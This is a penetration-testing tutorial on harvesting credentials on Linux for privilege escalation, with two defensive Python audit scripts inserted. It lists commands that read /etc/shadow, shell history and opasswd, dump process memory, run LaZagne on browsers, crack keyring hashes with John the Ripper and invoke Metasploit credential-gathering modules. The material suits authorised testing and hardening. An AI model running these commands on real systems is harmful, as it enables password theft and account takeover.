
Linux Privilege Escalation – Credentials Harvesting

Introduction

Linux-based operating systems and applications often store clear text, encoded or hashed credentials in files or in memory.

When gaining initial access to a Linux machine and performing privilege escalation enumeration steps, often passwords can be found through these means and they can be used to further escalate privileges.

There are various methods to harvest credentials on a Linux system in order to escalate privileges. The following ones are the most common and are always worth a try.

Finding passwords in files

One of the first things to do is to search for files containing the "password" or "passwd" string, or configuration files containing authentication information, as this can help in identifying hidden credentials:

  • grep --color=always -rnw '/' -ie "PASSWORD\|PASSWD" 2> /dev/null
  • find . -type f -exec grep -i -I "PASSWORD\|PASSWD" {} /dev/null \;
  • locate config.php
  • locate password; locate passwd
  • cat /var/mail/*; cat /var/spool/mail/*
  • locate config.
  • crontab -l; ls -alh /var/spool/cron; ls -al /etc/ | grep cron; ls -al /etc/cron; cat /etc/cron; cat /etc/at.allow; cat /etc/at.deny; cat /etc/cron.allow; cat /etc/cron.deny; cat /etc/crontab; cat /etc/anacrontab; cat /var/spool/cron/crontabs/root

Bash History

Bash and other shells, along with various services, often store the commands previously run on the system. These history files can contain clear-text or encoded passwords if they were hard-coded in the command itself:

  • find / -name "*_history" -xdev 2> /dev/null

Check for Hashes Stored in Passwd/Shadow

The /etc/passwd file used to store user password hashes, but it no longer does: these are now stored in the /etc/shadow file. The reason for the change is that some of the information in /etc/passwd has to be world-readable for the operating system to work correctly, so the hashes were moved to the shadow file, which is normally only readable by root. For backward compatibility, a hash placed in the password field of /etc/passwd is still honoured, so hashes may occasionally be found there.

  • find / -name passwd -xdev 2>/dev/null; find / -name shadow -xdev 2>/dev/null
  • cat /etc/passwd; cat /etc/shadow
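The backward-compatibility point above is worth checking from the defensive side as well: any real hash left in the second field of the world-readable /etc/passwd is exposed to every local user. The audit function below, an added example and not part of the original post, classifies each /etc/passwd entry by its password field; the sample file and the `$6$` value in it are constructed, not taken from any real system.

```python
import re

# crypt(3) hash shapes: "$<id>$[rounds=N$]<salt>$<hash>" (md5/sha/yescrypt)
# or the 13-character traditional DES form. Matching the shape is enough
# here; we only want to know whether a secret is sitting in /etc/passwd.
CRYPT_HASH = re.compile(r"^(\$[0-9a-z]+\$.+|[./0-9A-Za-z]{13})$")


def audit_passwd(text):
    """Classify every /etc/passwd line by its password field.

    Returns a dict with three lists of usernames:
      shadowed - field is 'x': the hash lives in /etc/shadow (modern layout)
      hashed   - field holds a real hash: readable by every local user
      empty    - field is empty: the account has no password at all
    Lock markers ('*', '!', '!!') carry no secret and are not reported.
    """
    result = {"shadowed": [], "hashed": [], "empty": []}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError("line %d: expected 7 fields, got %d"
                             % (lineno, len(fields)))
        user, pw = fields[0], fields[1]
        if pw == "x":
            result["shadowed"].append(user)
        elif pw == "":
            result["empty"].append(user)
        elif CRYPT_HASH.match(pw):
            result["hashed"].append(user)
    return result


# Constructed sample: the hash string is a dummy, not a real credential.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
legacy:$6$saltsalt$notarealhashvalue:1001:1001::/home/legacy:/bin/bash
guest::1002:1002::/home/guest:/bin/sh
"""

if __name__ == "__main__":
    report = audit_passwd(SAMPLE_PASSWD)
    for kind in ("hashed", "empty"):
        for user in report[kind]:
            print(f"{kind}: {user}")  # prints "hashed: legacy" and "empty: guest"
```

Run against a real file with `audit_passwd(open("/etc/passwd").read())`; anything in `hashed` or `empty` should be moved to /etc/shadow or locked.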

Old passwords in /etc/security/opasswd

The /etc/security/opasswd file is used by pam_cracklib (a module used on Linux to enforce a password policy) to store the hashed versions of old passwords used on the system, so that users cannot reuse the same ones over and over again.

  • cat /etc/security/opasswd
  • find / -name opasswd -xdev 2>/dev/null
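Both the history files from the Bash History section and /etc/security/opasswd are only a problem for privilege escalation when a lower-privileged user can read them. The script below is an added example, not part of the original post: it walks a directory tree for the filenames the sections above search for and reports those readable by "other". The file layout and modes are a constructed fixture in a temporary directory; point `exposed_sensitive_files` at `/` to audit a real host.

```python
import fnmatch
import os
import stat
import tempfile

# Filenames the sections above look for; as a defender we want to know
# whether any of them is readable by users other than owner and group.
SENSITIVE_PATTERNS = ("*_history", "opasswd", "shadow")


def exposed_sensitive_files(root):
    """Return sorted (relative path, octal mode) for regular files under
    `root` matching SENSITIVE_PATTERNS whose mode grants read to 'other'."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not any(fnmatch.fnmatch(name, p) for p in SENSITIVE_PATTERNS):
                continue
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode  # lstat: never follow symlinks
            if not stat.S_ISREG(mode):
                continue
            if mode & stat.S_IROTH:
                hits.append((os.path.relpath(path, root),
                             oct(stat.S_IMODE(mode))))
    return sorted(hits)


def demo():
    """Constructed fixture: a fake root with protected and exposed files.
    Returns the relative paths that the audit flags."""
    root = tempfile.mkdtemp()
    layout = {
        "home/alice/.bash_history": 0o644,  # world-readable: flagged
        "home/bob/.bash_history": 0o600,    # owner only: fine
        "etc/security/opasswd": 0o644,      # should be 0600: flagged
        "etc/shadow": 0o640,                # root:shadow, no 'other': fine
        "home/alice/notes.txt": 0o644,      # not a sensitive name
    }
    for rel, mode in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("constructed sample\n")
        os.chmod(path, mode)
    return [p for p, _ in exposed_sensitive_files(root)]


if __name__ == "__main__":
    for path in demo():
        print("readable by other:", path)
```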

Recently Modified Files

It can be useful to check files that were modified recently, as they may contain useful information and/or credentials. The following command finds files modified in the last 30 minutes:

  • find / -mmin -30 -xdev 2>/dev/null

Credentials Stored in Memory

Services will sometimes keep the credentials entered by the end user in clear text in memory. The commands below can help find credentials stored in processes:

  • strings /dev/mem -n10 | grep -iE "PASSWORD|PASSWD" --color=always

or with GDB:

  • ps -ef | grep [service name] (find the process id)
  • gdb -p [process id]
  • info proc mappings
  • q
  • dump memory /tmp/process <START_HEAD> <END_HEAD>
  • q
  • strings /tmp/process

You can also use the following tools to dump the system memory and find clear-text credentials stored within it:

Credentials Stored in Browsers

Browsers such as Google Chrome, Firefox, Microsoft Edge etc. can often store passwords when authentication to a website is performed. LaZagne is an open source application used to retrieve passwords stored on a local computer, and one of its many functions is to retrieve passwords stored in internet browsers.

Command                         Description
laZagne.py all                  Launch all modules
laZagne.py browsers             Launch only a specific module
laZagne.py browsers -firefox    Launch a specific software script
laZagne.py -h                   Get help
laZagne.py browsers -h          Get help for a specific module
laZagne.py all -vv              Change verbosity mode (2 different levels)

GNOME Keyring

GNOME Keyring is a software application designed to store security credentials such as usernames, passwords, and keys. The sensitive data is encrypted and stored in a keyring file in the user's home directory, which can be located with the following command:

  • locate login.keyring; locate user.keystore

John the Ripper can then be used to extract the hash from the keyring file and crack it to reveal the actual password:

  • /usr/share/john/keyring2john.py login.keyring > hashes.txt
  • /usr/share/john/keystore2john.py user.keystore
  • john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

MimiPenguin and the post/linux/gather/gnome_keyring_dump Metasploit module can also be used to perform this task.

Additional Metasploit Modules

There are a number of Metasploit modules that aim to find clear-text or encoded credentials on a target system:

  • use post/linux/gather/enum_system
  • use post/linux/gather/enum_users_history
  • use post/linux/gather/gnome_commander_creds
  • use post/linux/gather/hashdump
  • use post/linux/gather/gnome_keyring_dump
  • use post/linux/gather/enum_psk
  • use post/linux/gather/enum_configs
  • use post/linux/gather/ecryptfs_creds
  • use post/linux/gather/mount_cifs_creds
  • use post/linux/gather/openvpn_credentials
  • use post/linux/gather/phpmyadmin_credsteal
  • use post/linux/gather/pptpd_chap_secrets
  • use post/linux/gather/tor_hiddenservices
  • use post/multi/gather/filezilla_client_cred
  • use post/multi/gather/firefox_creds
  • use post/multi/gather/gpg_creds
  • use post/multi/gather/grub_creds
  • use post/multi/gather/irssi_creds
  • use post/multi/gather/lastpass_creds
  • use post/multi/gather/maven_creds
  • use post/multi/gather/netrc_creds
  • use post/multi/gather/pgpass_creds
  • use post/multi/gather/pidgin_cred
  • use post/multi/gather/remmina_creds
  • use post/multi/gather/rsyncd_creds
  • use post/multi/gather/ssh_creds
  • use post/multi/gather/thunderbird_creds

Conclusion

Exposed passwords are a very common means of intrusion and privilege escalation. Although it is less common nowadays, since most applications encrypt stored credentials, it is something that should not be overlooked.

Automated enumeration scripts will also perform credential harvesting, although it is always best to do this manually as well.